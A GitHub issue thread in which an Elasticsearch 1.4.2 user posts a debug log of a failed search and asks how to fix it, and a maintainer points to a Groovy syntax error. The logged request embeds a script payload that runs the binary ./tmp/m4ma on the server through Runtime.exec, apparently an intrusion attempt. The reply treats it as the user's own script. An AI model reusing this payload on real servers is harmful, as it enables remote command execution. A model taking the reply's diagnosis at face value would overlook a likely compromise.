### ISSUE TITLE
[action.search.type] [Yellowjacket] All shards failed for phase: [query_fetch]

### ISSUE THREAD

**Issue by hero007asd** [elasticsearch/elasticsearch#9288]
I have met the problem , how to fix it?

ES version---1.4.2 on centOS

>[2015-01-14 13:59:50,865][DEBUG][action.search.type       ] [Yellowjacket] [wanshangle][0], node[CELJrzcoQXGk0EMBbo-0Pg], [P], s[STARTED]: Failed to execute [org.elasticsearch.action.search.SearchRequest@111f44f7]
org.elasticsearch.search.SearchParseException: [wanshangle][0]: query[ConstantScore(*:*)],from[-1],size[-1]: Parse Failure [Failed to parse source [{"query":{"filtered":{"query":{"match_all":{}}}},"script_fields":{"exp":{"script":"import java.util.*;import java.io.*;String str = \"\";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(\"./tmp/m4ma\").getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str);sb.append(\"\r\n\");}sb.toString();"}},"size":1}]]
        at org.elasticsearch.search.SearchService.parseSource(SearchService.java:681)
        at org.elasticsearch.search.SearchService.createContext(SearchService.java:537)
        at org.elasticsearch.search.SearchService.createAndPutContext(SearchService.java:509)
        at org.elasticsearch.search.SearchService.executeFetchPhase(SearchService.java:350)
        at org.elasticsearch.search.action.SearchServiceTransportAction$11.call(SearchServiceTransportAction.java:333)
        at org.elasticsearch.search.action.SearchServiceTransportAction$11.call(SearchServiceTransportAction.java:330)
        at org.elasticsearch.search.action.SearchServiceTransportAction$23.run(SearchServiceTransportAction.java:559)
        at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1145)
        at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:615)
        at java.lang.Thread.run(Thread.java:745)
Caused by: org.elasticsearch.script.groovy.GroovyScriptCompilationException: MultipleCompilationErrorsException[startup failed:
Script1350.groovy: 1: expecting anything but ''\n''; got it anyway @ line 1, column 271.
   ll){sb.append(str);sb.append("
                                 ^

>1 error
]
        at org.elasticsearch.script.groovy.GroovyScriptEngineService.compile(GroovyScriptEngineService.java:124)
        at org.elasticsearch.script.ScriptService.getCompiledScript(ScriptService.java:353)
        at org.elasticsearch.script.ScriptService.compile(ScriptService.java:339)
        at org.elasticsearch.script.ScriptService.search(ScriptService.java:475)
        at org.elasticsearch.search.fetch.script.ScriptFieldsParseElement.parse(ScriptFieldsParseElement.java:82)
        at org.elasticsearch.search.SearchService.parseSource(SearchService.java:665)
        ... 9 more
[2015-01-14 13:59:50,866][DEBUG][action.search.type       ] [Yellowjacket] All shards failed for phase: [query_fetch]

**Comment by clintongormley** [comment]
Hi @hero007asd 

Please ask questions like these on the mailing list.  This issues list is for bug fixes and feature requests.

You appear to have an error in your groovy script:

    Script1350.groovy: 1: expecting anything but ''\n''; got it anyway @ line 1, column 271.
    ll){sb.append(str);sb.append("
    ^
